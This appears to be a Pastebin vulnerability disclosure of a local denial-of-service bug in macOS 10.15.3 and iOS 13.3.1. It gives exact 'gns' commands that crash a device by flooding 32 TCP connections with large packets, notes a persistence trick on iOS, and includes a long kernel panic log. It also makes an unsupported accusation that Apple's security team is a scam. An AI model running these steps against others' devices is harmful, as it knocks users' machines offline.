Advertisement
gvalkov

Crash macOS 10.15.3 and iOS 13.3.1 by sending large data pac

Mar 19th, 2020
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.98 KB | None | 0 0
  1. Crash macOS 10.15.3 and iOS 13.3.1 by sending large data packets >= 2MB over 16 or more TCP connections
  2. https://www.youtube.com/watch?v=yEUncSvY04Y
  3. https://www.youtube.com/watch?v=3p_hakQXYxo
  4. https://www.youtube.com/watch?v=E1Plab0CgJM
  5. https://www.youtube.com/watch?v=mJryK4kA0qM
  6.  
  7. Exploit description
  8. Resource limits and handling within the TCP stack on iOS and macOS allow an attacker to exhaust a pool of system resources, causing system components to stop responding waiting to obtain a resource. As a result the user space is unable to service the watchdog, which expires a minute later generating a kernel panic.
  9.  
  10. Attack vector
  11. To exploit the vulnerability one has to establish 16 or more TCP connections. 32 up to 128 work reliably and exploit it every time. Then start a dedicated thread for each connection and send large packets of size 2 MB or more. iOS reboots instantly. After successful exploit on macOS, the exploit application cannot be stopped or killed. Once at that state, some applications such as Activity Monitor stop responding, and within a minute there is a kernel panic (userspace watchdog timeout) and the machine powers off. The exploit can be triggered by any local user. On iOS, persistency can be obtained by registering the exploit to run as a Widget or handle Notifications.
  12.  
  13. Vulnerability type: Denial of Service (local), may persist after reboot
  14. Component: kernel resource pool, TCP stack
  15. Vendor: Apple Inc.
  16. Product: macOS, iOS
  17. Version: macOS Catalina 10.15.3, iOS 13.3.1
  18. Impact: Denial of Service (local)
  19.  
  20. product-security@apple.com is a scam! Apple do not want to acknowledge and pay bounty to people who discover exploits.
  21. I disclosed this exploit privately to them on 18th of February 2020. A couple of weeks later they stopped replaying to my e-mails.
  22.  
  23. Proof of Concept POC: download my network benchmark tool and use it to exploit the vulnerability:
  24. http://httpstorm.com/tools/gns/
  25.  
  26. Steps to reproduce:
  27. The device sending large data packets will crash. It can be server or client.
  28.  
  29. exploit commands 1: the same device operates as both server and client and will crash. No remote server or client is required.
  30. devices opens a listening socket on TCP port 81, connects to itself and starts sending data over 32 connections.
  31. server: gns -lp81
  32. client: gns 127.0.0.1 81 -wc32
  33.  
  34. exploit commands 2: client will crash
  35. server listens on TCP port 81, client connects to server IP on TCP port 81 and sends large data packets over 32 connections
  36. server: gns -lp81
  37. client: gns SERVER_IP 81 -wc32
  38.  
  39. exploit commands 3: server will crash
  40. server listens on TCP port 81, client establishes 32 connection to server IP on TCP port 81, server sends large data packets over all connections
  41. server: gns -wlp81
  42. client: gns SERVER_IP 81 -c32
  43.  
  44. Legend:
  45. l = listen
  46. p = specify port number
  47. 81 = user TCP port 81
  48. w = this device sends data over the TCP connection
  49. c = specify number of TCP connections
  50. 32 = use 32 TCP connections
  51. SERVER_IP = IP address of server
  52.  
  53.  
  54.  
  55. panic(cpu 2 caller 0xffffff7f9bd9dad5): userspace watchdog timeout: remoted connection watchdog expired, no updates from remoted monitoring thread in 60 seconds, 27 checkins from thread since monitoring enabled 580 seconds ago after loadservice: com.apple.logd, total successful checkins since load (580 seconds ago): 58, last successful checkin: 10 seconds ago
  56. service: com.apple.WindowServer, total successful checkins since load (550 seconds ago): 54, last successful checkin: 10 seconds ago
  57.  
  58. Backtrace (CPU 2), Frame : Return Address
  59. 0xffffff83c5dd3820 : 0xffffff801b33bb2b
  60. 0xffffff83c5dd3870 : 0xffffff801b4734d5
  61. 0xffffff83c5dd38b0 : 0xffffff801b464f4e
  62. 0xffffff83c5dd3900 : 0xffffff801b2e2a40
  63. 0xffffff83c5dd3920 : 0xffffff801b33b217
  64. 0xffffff83c5dd3a20 : 0xffffff801b33b5fb
  65. 0xffffff83c5dd3a70 : 0xffffff801bad2b25
  66. 0xffffff83c5dd3ae0 : 0xffffff7f9bd9dad5
  67. 0xffffff83c5dd3af0 : 0xffffff7f9bd9d7e6
  68. 0xffffff83c5dd3b10 : 0xffffff801ba6739b
  69. 0xffffff83c5dd3b60 : 0xffffff801ba70443
  70. 0xffffff83c5dd3ca0 : 0xffffff801b422d12
  71. 0xffffff83c5dd3db0 : 0xffffff801b3419d8
  72. 0xffffff83c5dd3e10 : 0xffffff801b318635
  73. 0xffffff83c5dd3e70 : 0xffffff801b32f0e5
  74. 0xffffff83c5dd3f00 : 0xffffff801b44b575
  75. 0xffffff83c5dd3fa0 : 0xffffff801b2e3226
  76. Kernel Extensions in backtrace:
  77. com.apple.driver.watchdog(1.0)[053A5D15-51D4-3E61-978B-EB435FA4BD0A]@0xffffff7f9bd9c000->0xffffff7f9bda4fff
  78.  
  79. BSD process name corresponding to current thread: watchdogd
  80. Boot args: chunklist-security-epoch=0 -chunklist-no-rev2-dev
  81.  
  82. Mac OS version:
  83. 19D76
  84.  
  85. Kernel version:
  86. Darwin Kernel Version 19.3.0: Thu Jan 9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
  87. Kernel UUID: A8DDE75C-CD97-3C37-B35D-1070CC50D2CE
  88. Kernel slide: 0x000000001b000000
  89. Kernel text base: 0xffffff801b200000
  90. __HIB text base: 0xffffff801b100000
  91. System model name: MacBookPro15,1 (Mac-937A206F2EE63C01)
  92. System shutdown begun: NO
  93.  
  94. System uptime in nanoseconds: 589081430568
  95. last loaded kext at 18150396650: @kext.AMDFramebuffer 3.0.5 (addr 0xffffff7fa09c8000, size 249856)
  96. loaded kexts:
  97. @kext.AMDFramebuffer 3.0.5
  98. @kext.AMDRadeonX4000 3.0.5
  99. @kext.AMDRadeonServiceManager 3.0.5
  100. >!AGraphicsDevicePolicy 4.7.2
  101. @fileutil 20.036.15
  102. @AGDCPluginDisplayMetrics 4.7.2
  103. >!AHV 1
  104. |IOUserEthernet 1.0.1
  105. |IO!BSerialManager 7.0.3f5
  106. >pmtelemetry 1
  107. >!AUpstreamUserClient 3.6.8
  108. >!APlatformEnabler 2.7.0d0
  109. >AGPM 111.4.2
  110. >X86PlatformShim 1.0.0
  111. @Dont_Steal_Mac_OS_X 7.0.0
  112. >!A!IKBLGraphics 14.0.4
  113. >AGDCBacklightControl 4.7.2
  114. >ACPI_SMC_PlatformPlugin 1.0.0
  115. >!AThunderboltIP 3.1.3
  116. @kext.AMD9500!C 3.0.5
  117. >BridgeAudioCommunication 6.66
  118. >!ABacklight 180.1
  119. >!ATopCaseHIDEventDriver 3430.1
  120. >!AGFXHDA 100.1.424
  121. >!A!ISlowAdaptiveClocking 4.0.0
  122. >!A!IPCHPMC 2.0.1
  123. >!AMuxControl2 4.7.2
  124. >!AHIDALSService 1
  125. >!ABridgeAudio!C 6.66
  126. >!A!ICFLGraphicsFramebuffer 14.0.4
  127. >!AAVEBridge 6.1
  128. >!AFIVRDriver 4.1.0
  129. >!AMCCSControl 1.13
  130. @filesystems.autofs 3.0
  131. @filesystems.ntfs 3.14.3
  132. >BCMWLANFirmware4355.Hashstore 1
  133. >BCMWLANFirmware4364.Hashstore 1
  134. >BCMWLANFirmware4377.Hashstore 1
  135. >!AFileSystemDriver 3.0.1
  136. @filesystems.hfs.kext 522.0.9
  137. @BootCache 40
  138. @!AFSCompression.!AFSCompressionTypeDataless 1.0.0d1
  139. @!AFSCompression.!AFSCompressionTypeZlib 1.0.0
  140. >!AVirtIO 1.0
  141. >!ABCMWLANBusInterfacePCIe 1
  142. @filesystems.apfs 1412.81.1
  143. @private.KextAudit 1.0
  144. >!ASmartBatteryManager 161.0.0
  145. >!AACPIButtons 6.1
  146. >!ASMBIOS 2.1
  147. >!AACPIEC 6.1
  148. >!AAPIC 1.7
  149. $!AImage4 1
  150. @nke.applicationfirewall 303
  151. $TMSafetyNet 8
  152. @!ASystemPolicy 2.0.0
  153. |EndpointSecurity 1
  154. @kext.AMDRadeonX4100HWLibs 1.0
  155. @kext.AMDRadeonX4000HWServices 3.0.5
  156. |IOAVB!F 800.17
  157. >!ASSE 1.0
  158. @!AGPUWrangler 4.7.2
  159. >IOPlatformPluginLegacy 1.0.0
  160. >!AHDA!C 283.15
  161. |IOHDA!F 283.15
  162. >!ABacklightExpert 1.1.0
  163. >!AHS!BDriver 3430.1
  164. >IO!BHIDDriver 7.0.3f5
  165. |IONDRVSupport 569.4
  166. >!AActuatorDriver 3430.1
  167. >!AMultitouchDriver 3430.1
  168. >!AInputDeviceSupport 3430.1
  169. |IOSlowAdaptiveClocking!F 1.0.0
  170. >X86PlatformPlugin 1.0.0
  171. >IOPlatformPlugin!F 6.0.0d8
  172. >!AGraphicsControl 4.7.2
  173. >!AThunderboltEDMSink 4.2.2
  174. >!AThunderboltDPOutAdapter 6.2.5
  175. >!AHIDKeyboard 209
  176. |IO!BHost!CUARTTransport 7.0.3f5
  177. |IO!BHost!CTransport 7.0.3f5
  178. >!A!ILpssUARTv1 3.0.60
  179. >!A!ILpssUARTCommon 3.0.60
  180. >!AOnboardSerial 1.0
  181. >!ASMBusPCI 1.0.14d1
  182. @kext.AMDSupport 3.0.5
  183. @!AGraphicsDeviceControl 4.7.2
  184. |IOAccelerator!F2 438.3.1
  185. >!ASMBus!C 1.0.18d1
  186. |IOGraphics!F 569.4
  187. @plugin.IOgPTPPlugin 810.1
  188. |IOEthernetAVB!C 1.1.0
  189. @kext.triggers 1.0
  190. >usb.IOUSBHostHIDDevice 1.2
  191. >usb.cdc.ecm 5.0.0
  192. >usb.cdc.ncm 5.0.0
  193. >usb.cdc 5.0.0
  194. >usb.networking 5.0.0
  195. >usb.!UHostCompositeDevice 1.2
  196. |IOSurface 269.6
  197. @filesystems.hfs.encodings.kext 1
  198. |IOAudio!F 300.2
  199. @vecLib.kext 1.2.0
  200. >!ABCMWLANCore 1.0.0
  201. >mDNSOffloadUserClient 1.0.1b8
  202. >IOImageLoader 1.0.0
  203. |IOSerial!F 11
  204. |IO80211!FV2 1200.12.2b1
  205. >corecapture 1.0.4
  206. |IOSkywalk!F 1
  207. >!AThunderboltPCIDownAdapter 2.5.4
  208. >!AThunderboltDPInAdapter 6.2.5
  209. >!AThunderboltDPAdapter!F 6.2.5
  210. >!AHPM 3.4.4
  211. >!A!ILpssI2C!C 3.0.60
  212. >!A!ILpssDmac 3.0.60
  213. >!A!ILpssI2C 3.0.60
  214. >!AXsanScheme 3
  215. >usb.!UVHCIBCE 1.2
  216. >usb.!UVHCI 1.2
  217. >usb.!UVHCICommonBCE 1.0
  218. >usb.!UVHCICommon 1.0
  219. >!AThunderboltNHI 5.8.6
  220. |IOThunderbolt!F 7.6.0
  221. >!AEffaceableNOR 1.0
  222. |IOBufferCopy!C 1.1.0
  223. |IOBufferCopyEngine!F 1
  224. >usb.!UHostPacketFilter 1.0
  225. |IOUSB!F 900.4.2
  226. |IONVMe!F 2.1.0
  227. >usb.!UXHCIPCI 1.2
  228. >usb.!UXHCI 1.2
  229. >!AEFINVRAM 2.1
  230. >!AEFIRuntime 2.1
  231. >!ASMCRTC 1.0
  232. |IOSMBus!F 1.1
  233. |IOHID!F 2.0.0
  234. $quarantine 4
  235. $sandbox 300.0
  236. @kext.!AMatch 1.0.0d1
  237. >!AKeyStore 2
  238. >!UTDM 489.80.2
  239. |IOSCSIBlockCommandsDevice 422.0.2
  240. >!ACredentialManager 1.0
  241. >KernelRelayHost 1
  242. >!ASEPManager 1.0.1
  243. >IOSlaveProcessor 1
  244. >!AFDEKeyStore 28.30
  245. >!AEffaceable!S 1.0
  246. >!AMobileFileIntegrity 1.0.5
  247. @kext.CoreTrust 1
  248. |CoreAnalytics!F 1
  249. |IOTimeSync!F 810.1
  250. |IONetworking!F 3.4
  251. >DiskImages 493.0.0
  252. |IO!B!F 7.0.3f5
  253. |IO!BPacketLogger 7.0.3f5
  254. |IOUSBMass!SDriver 157.40.7
  255. |IOSCSIArchitectureModel!F 422.0.2
  256. |IO!S!F 2.1
  257. |IOUSBHost!F 1.2
  258. >usb.!UCommon 1.0
  259. >!UHostMergeProperties 1.2
  260. >!ABusPower!C 1.0
  261. |IOReport!F 47
  262. >!AACPIPlatform 6.1
  263. >!ASMC 3.1.9
  264. >watchdog 1
  265. |IOPCI!F 2.9
  266. |IOACPI!F 1.4
  267. @kec.pthread 1
  268. @kec.corecrypto 1.0
  269. @kec.Libm 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement